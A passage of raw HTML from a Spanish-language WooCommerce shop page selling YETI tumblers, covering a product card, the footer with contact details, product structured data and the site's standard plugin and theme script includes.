product_cat-tumbler has-post-thumbnail shipping-taxable purchasable product-type-variable"> <div class="product-inner clr"> <div class="woo-entry-image clr"> <a href="http://yetilizate.com/tienda/producto/yeti-tumbler-10oz/" class="woocommerce-LoopProduct-link"> <img width="300" height="300" src="http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-300x300.png" class="woo-entry-image-main" alt="YETI Tumbler 10oz" loading="lazy" itemprop="image" srcset="http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-300x300.png 300w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-150x150.png 150w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <a href="#" id="product_id_37" class="owp-quick-view" data-product_id="37"><i class="icon-eye" aria-hidden="true"></i>Vista rápida</a> </div><!-- .woo-entry-image --> <div class="tinv-wraper woocommerce tinv-wishlist tinvwl-after-add-to-cart tinvwl-loop-button-wrapper"> <div class="tinv-wishlist-clear"></div><a role="button" aria-label="Añadir a favoritos" class="tinvwl_add_to_wishlist_button tinvwl-icon-heart tinvwl-position-after" data-tinv-wl-list="[]" data-tinv-wl-product="37" data-tinv-wl-productvariation="0" data-tinv-wl-productvariations="[466,467,468,469,470,471,473,474,475,476,477,478,479,480,481,0]" data-tinv-wl-producttype="variable" data-tinv-wl-action="add"><span class="tinvwl_add_to_wishlist-text">Añadir a favoritos</span></a><div class="tinv-wishlist-clear"></div> <div class="tinvwl-tooltip">Añadir a favoritos</div> </div> <ul class="woo-entry-inner clr"><li class="image-wrap"> <div class="woo-entry-image clr"> <a href="http://yetilizate.com/tienda/producto/yeti-tumbler-10oz/" class="woocommerce-LoopProduct-link"> <img width="300" height="300" src="http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-300x300.png" class="woo-entry-image-main" alt="YETI Tumbler 10oz" loading="lazy" itemprop="image" srcset="http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-300x300.png 300w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-150x150.png 150w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/10oz-frontal-negro-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <a href="#" id="product_id_37" class="owp-quick-view" data-product_id="37"><i class="icon-eye" aria-hidden="true"></i>Vista rápida</a> </div><!-- .woo-entry-image --> </li><li class="category"><a href="http://yetilizate.com/tienda/categoria-producto/10oz/" rel="tag">10oz</a>, <a href="http://yetilizate.com/tienda/categoria-producto/tumbler/" rel="tag">Tumbler</a></li><li class="title"><a href="http://yetilizate.com/tienda/producto/yeti-tumbler-10oz/">YETI Tumbler 10oz</a></li><li class="inner"> <span class="price"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span>480.00</bdi></span></span> </li></ul></div><!-- .product-inner .clr --></li> </ul> </section> </div> </article><!-- #post --> </div><!-- #content --> </div><!-- #primary --> </div><!-- #content-wrap --> </main><!-- #main --> <footer id="footer" class="site-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter" role="contentinfo"> <div id="footer-inner" class="clr"> <div id="footer-widgets" class="oceanwp-row clr"> <div class="footer-widgets-inner container"> <div class="footer-box span_1_of_4 col col-1"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-2"> <div id="nav_menu-2" class="footer-widget widget_nav_menu clr"><h4 class="widget-title">ENLACES RÁPIDOS</h4><div class="menu-pie-container"><ul id="menu-pie" class="menu"><li id="menu-item-227" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-227"><a href="http://yetilizate.com/tienda/mi-cuenta/">Mi cuenta</a></li> <li id="menu-item-240" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-240"><a href="http://yetilizate.com/tienda/mi-cuenta/orders/">Pedidos</a></li> </ul></div></div> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-3 "> <div id="text-3" class="footer-widget widget_text clr"><h4 class="widget-title">PAGOS SEGUROS</h4> <div class="textwidget"><p><a href="http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1.png"><img loading="lazy" class="size-medium wp-image-228 aligncenter" src="http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-300x75.png" alt="" width="300" height="75" srcset="http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-300x75.png 300w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-600x149.png 600w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-1024x255.png 1024w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-768x191.png 768w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-1536x382.png 1536w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-1-2048x509.png 2048w" sizes="(max-width: 300px) 100vw, 300px" /></a> <a href="http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2.png"><img loading="lazy" class="size-medium wp-image-229 aligncenter" src="http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-300x79.png" alt="" width="300" height="79" srcset="http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-300x79.png 300w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-600x157.png 600w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-1024x269.png 1024w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-768x202.png 768w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-1536x403.png 1536w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/Untitled-2-2048x537.png 2048w" sizes="(max-width: 300px) 100vw, 300px" /></a></p> </div> </div> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-4"> <div id="ocean_contact_info-2" class="footer-widget widget-oceanwp-contact-info clr"><h4 class="widget-title">Información de contacto</h4><ul class="contact-info-widget default"><li class="address"><i class="icon-location-pin" aria-hidden="true"></i><div class="oceanwp-info-wrap"><span class="oceanwp-contact-title">Dirección:</span><span class="oceanwp-contact-text">Veracruz, Ver.</span></div></li><li class="phone"><i class="icon-phone" aria-hidden="true"></i><div class="oceanwp-info-wrap"><span class="oceanwp-contact-title">Teléfono:</span><span class="oceanwp-contact-text">(229) 207 5097</span></div></li><li class="email"><i class="icon-envelope" aria-hidden="true"></i><div class="oceanwp-info-wrap"><span class="oceanwp-contact-title">Correo electrónico:</span><span class="oceanwp-contact-text"><a href="mailto:pedidos@yetilizate.com">pedidos@yetilizate.com</a><span class="screen-reader-text">Se abre en tu aplicación</span></span></div></li></ul></div> </div><!-- .footer-box --> </div><!-- .container --> </div><!-- #footer-widgets --> <div id="footer-bottom" class="clr no-footer-nav"> <div id="footer-bottom-inner" class="container clr"> <div id="copyright" class="clr" role="contentinfo"> Copyright 2020 - Yetilizate </div><!-- #copyright --> </div><!-- #footer-bottom-inner --> </div><!-- #footer-bottom --> </div><!-- #footer-inner --> </footer><!-- #footer --> </div><!-- #wrap --> </div><!-- #outer-wrap --> <a id="scroll-top" class="scroll-top-right" href="#"><span class="fa fa-angle-up" aria-label="Hacer scroll a la parte superior de la página"></span></a> <div id="sidr-close"> <a href="#" class="toggle-sidr-close" aria-label="Cerrar el menú móvil"> <i class="icon icon-close" aria-hidden="true"></i><span class="close-text">Cerrar menú</span> </a> </div> <div id="mobile-menu-search" class="clr"> <form method="get" action="http://yetilizate.com/tienda/" class="mobile-searchform" role="search" aria-label="Buscar:"> <label for="ocean-mobile-search2"> <input type="search" name="s" autocomplete="off" placeholder="Buscar" /> <button type="submit" class="searchform-submit" aria-label="Enviar la búsqueda"> <i class="icon icon-magnifier" aria-hidden="true"></i> </button> </label> </form> </div><!-- .mobile-menu-search --> <div id="owp-qv-wrap"> <div class="owp-qv-container"> <div class="owp-qv-content-wrap"> <div class="owp-qv-content-inner"> <a href="#" class="owp-qv-close" aria-label="Cerrar la vista previa rápida">×</a> <div id="owp-qv-content" class="woocommerce single-product"></div> </div> </div> </div> <div class="owp-qv-overlay"></div> </div> <div id="oceanwp-cart-sidebar-wrap"><div class="oceanwp-cart-sidebar"><a href="#" class="oceanwp-cart-close">×</a><p class="owp-cart-title">Carrito</p><div class="divider"></div><div class="owp-mini-cart"><div class="widget woocommerce widget_shopping_cart"><div class="widget_shopping_cart_content"></div></div></div></div><div class="oceanwp-cart-sidebar-overlay"></div></div><script type="application/ld+json">{"@context":"https:\/\/schema.org\/","@type":"Product","@id":"http:\/\/yetilizate.com\/tienda\/producto\/yeti-tumbler-20oz\/#product","name":"YETI Tumbler 20oz","url":"http:\/\/yetilizate.com\/tienda\/producto\/yeti-tumbler-20oz\/","description":"Cualquier vaso que se presente en el viaje debe ser lo suficientemente resistente para mantenerse al d\u00eda. Nuestro Rambler\u00ae 20 oz. est\u00e1 hecho de acero inoxidable duradero con aislamiento de vac\u00edo de doble pared para proteger su bebida fr\u00eda o caliente a toda costa. Como toda la familia Rambler, el 20 oz. El vaso y su tapa se pueden lavar en el lavavajillas para facilitar la limpieza.","image":"http:\/\/yetilizate.com\/tienda\/wp-content\/uploads\/2020\/09\/20oz-delantero-negro.png","sku":"20oz","offers":[{"@type":"Offer","price":"495.00","priceValidUntil":"2025-12-31","priceSpecification":{"price":"495.00","priceCurrency":"MXN","valueAddedTaxIncluded":"false"},"priceCurrency":"MXN","availability":"http:\/\/schema.org\/InStock","url":"http:\/\/yetilizate.com\/tienda\/producto\/yeti-tumbler-20oz\/","seller":{"@type":"Organization","name":"YETIlizate MX - Tienda","url":"http:\/\/yetilizate.com\/tienda"}}]}</script> <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true"> <div class="pswp__bg"></div> <div class="pswp__scroll-wrap"> <div class="pswp__container"> <div class="pswp__item"></div> <div class="pswp__item"></div> <div class="pswp__item"></div> </div> <div class="pswp__ui pswp__ui--hidden"> <div class="pswp__top-bar"> <div class="pswp__counter"></div> <button class="pswp__button pswp__button--close" aria-label="Cerrar (Esc)"></button> <button class="pswp__button pswp__button--share" aria-label="Compartir"></button> <button class="pswp__button pswp__button--fs" aria-label="Cambiar a pantalla completa"></button> <button class="pswp__button pswp__button--zoom" aria-label="Ampliar/Reducir"></button> <div class="pswp__preloader"> <div class="pswp__preloader__icn"> <div class="pswp__preloader__cut"> <div class="pswp__preloader__donut"></div> </div> </div> </div> </div> <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap"> <div class="pswp__share-tooltip"></div> </div> <button class="pswp__button pswp__button--arrow--left" aria-label="Anterior (flecha izquierda)"></button> <button class="pswp__button pswp__button--arrow--right" aria-label="Siguiente (flecha derecha)"></button> <div class="pswp__caption"> <div class="pswp__caption__center"></div> </div> </div> </div> </div> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type='text/javascript' id='contact-form-7-js-extra'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/yetilizate.com\/tienda\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.2' id='contact-form-7-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70' id='jquery-blockui-js'></script> <script type='text/javascript' id='wc-add-to-cart-js-extra'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/tienda\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/tienda\/?wc-ajax=%%endpoint%%","i18n_view_cart":"Ver carrito","cart_url":"http:\/\/yetilizate.com\/tienda\/carrito\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.4.4' id='wc-add-to-cart-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/zoom/jquery.zoom.min.js?ver=1.7.21' id='zoom-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/flexslider/jquery.flexslider.min.js?ver=2.7.2' id='flexslider-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe.min.js?ver=4.1.1' id='photoswipe-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe-ui-default.min.js?ver=4.1.1' id='photoswipe-ui-default-js'></script> <script type='text/javascript' id='wc-single-product-js-extra'> /* <![CDATA[ */ var wc_single_product_params = {"i18n_required_rating_text":"Por favor elige una puntuaci\u00f3n","review_rating_required":"yes","flexslider":{"rtl":false,"animation":"slide","smoothHeight":true,"directionNav":false,"controlNav":"thumbnails","slideshow":false,"animationSpeed":500,"animationLoop":false,"allowOneSlide":false},"zoom_enabled":"1","zoom_options":[],"photoswipe_enabled":"1","photoswipe_options":{"shareEl":false,"closeOnScroll":false,"history":false,"hideAnimationDuration":0,"showAnimationDuration":0},"flexslider_enabled":"1"}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/frontend/single-product.min.js?ver=4.4.4' id='wc-single-product-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4' id='js-cookie-js'></script> <script type='text/javascript' id='woocommerce-js-extra'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/tienda\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/tienda\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.4.4' id='woocommerce-js'></script> <script type='text/javascript' id='wc-cart-fragments-js-extra'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/tienda\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/tienda\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_09164f04a844c4deaa11fc5956c99d9c","fragment_name":"wc_fragments_09164f04a844c4deaa11fc5956c99d9c","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4.4.4' id='wc-cart-fragments-js'></script> <script type='text/javascript' id='tinvwl-js-extra'> /* <![CDATA[ */ var tinvwl_add_to_wishlist = {"text_create":"Crear nuevo","text_already_in":"\"{product_name}\" ya est\u00e1 en favoritos","simple_flow":"","hide_zero_counter":"","i18n_make_a_selection_text":"Elige las opciones del producto antes de a\u00f1adirlo a tu lista de deseos.","tinvwl_break_submit":"No se han seleccionado art\u00edculos o acciones.","tinvwl_clipboard":"\u00a1Copiado!","allow_parent_variable":"","block_ajax_wishlists_data":"","update_wishlists_data":"","hash_key":"ti_wishlist_data_09164f04a844c4deaa11fc5956c99d9c","nonce":"665886e1a0","rest_root":"http:\/\/yetilizate.com\/tienda\/wp-json\/","plugin_url":"http:\/\/yetilizate.com\/tienda\/wp-content\/plugins\/ti-woocommerce-wishlist\/"}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/ti-woocommerce-wishlist/assets/js/public.min.js?ver=1.21.5' id='tinvwl-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-includes/js/comment-reply.min.js?ver=5.5.15' id='comment-reply-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-includes/js/imagesloaded.min.js?ver=4.1.4' id='imagesloaded-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/woo/woo-scripts.min.js?ver=1.8.7' id='oceanwp-woocommerce-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/magnific-popup.min.js?ver=1.8.7' id='magnific-popup-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/lightbox.min.js?ver=1.8.7' id='oceanwp-lightbox-js'></script> <script type='text/javascript' id='oceanwp-main-js-extra'> /* <![CDATA[ */ var oceanwpLocalize = {"isRTL":"","menuSearchStyle":"drop_down","sidrSource":"#sidr-close, #site-navigation, #mobile-menu-search","sidrDisplace":"1","sidrSide":"left","sidrDropdownTarget":"link","verticalHeaderTarget":"link","customSelects":".woocommerce-ordering .orderby, #dropdown_product_cat, .widget_categories select, .widget_archive select, .single-product .variations_form .variations select","wooCartStyle":"drop_down","ajax_url":"http:\/\/yetilizate.com\/tienda\/wp-admin\/admin-ajax.php","cart_url":"http:\/\/yetilizate.com\/tienda\/carrito\/","cart_redirect_after_add":"no","view_cart":"Ver carrito","floating_bar":"on","grouped_text":"Ver productos"}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/main.min.js?ver=1.8.7' id='oceanwp-main-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/woo/woo-quick-view.min.js?ver=1.8.7' id='oceanwp-woo-quick-view-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-includes/js/underscore.min.js?ver=1.8.3' id='underscore-js'></script> <script type='text/javascript' id='wp-util-js-extra'> /* <![CDATA[ */ var _wpUtilSettings = {"ajax":{"url":"\/tienda\/wp-admin\/admin-ajax.php"}}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-includes/js/wp-util.min.js?ver=5.5.15' id='wp-util-js'></script> <script type='text/javascript' id='wc-add-to-cart-variation-js-extra'> /* <![CDATA[ */ var wc_add_to_cart_variation_params = {"wc_ajax_url":"\/tienda\/?wc-ajax=%%endpoint%%","i18n_no_matching_variations_text":"Lo sentimos, no hay productos que igualen tu selecci\u00f3n. Por favor escoge una combinaci\u00f3n diferente.","i18n_make_a_selection_text":"Elige las opciones del producto antes de a\u00f1adir este producto a tu carrito.","i18n_unavailable_text":"Lo sentimos, este producto no est\u00e1 disponible. Por favor elige otra combinaci\u00f3n."}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart-variation.min.js?ver=4.4.4' id='wc-add-to-cart-variation-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/woo/woo-floating-bar.min.js?ver=1.8.7' id='oceanwp-woo-floating-bar-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/woo/woo-mini-cart.min.js?ver=1.8.7' id='oceanwp-woo-mini-cart-js'></script> <script type='text/javascript' id='rtwpvs-js-extra'> /* <![CDATA[ */ var rtwpvs_params = {"is_product_page":"1","reselect_clear":""}; /* ]]> */ </script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/woo-product-variation-swatches/assets/js/rtwpvs.min.js?ver=1725732145' id='rtwpvs-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/lumise/woo/assets/js/frontend.js?ver=1.9.2' id='lumise-frontend-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/plugins/ocean-social-sharing/assets/js/social.min.js?ver=1.1.0' id='oss-social-share-script-js'></script> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-includes/js/wp-embed.min.js?ver=5.5.15' id='wp-embed-js'></script> <!--[if lt IE 9]> <script type='text/javascript' src='http://yetilizate.com/tienda/wp-content/themes/oceanwp/assets/js/third/html5.min.js?ver=1.8.7' id='html5shiv-js'></script> <![endif]--> </body> </html>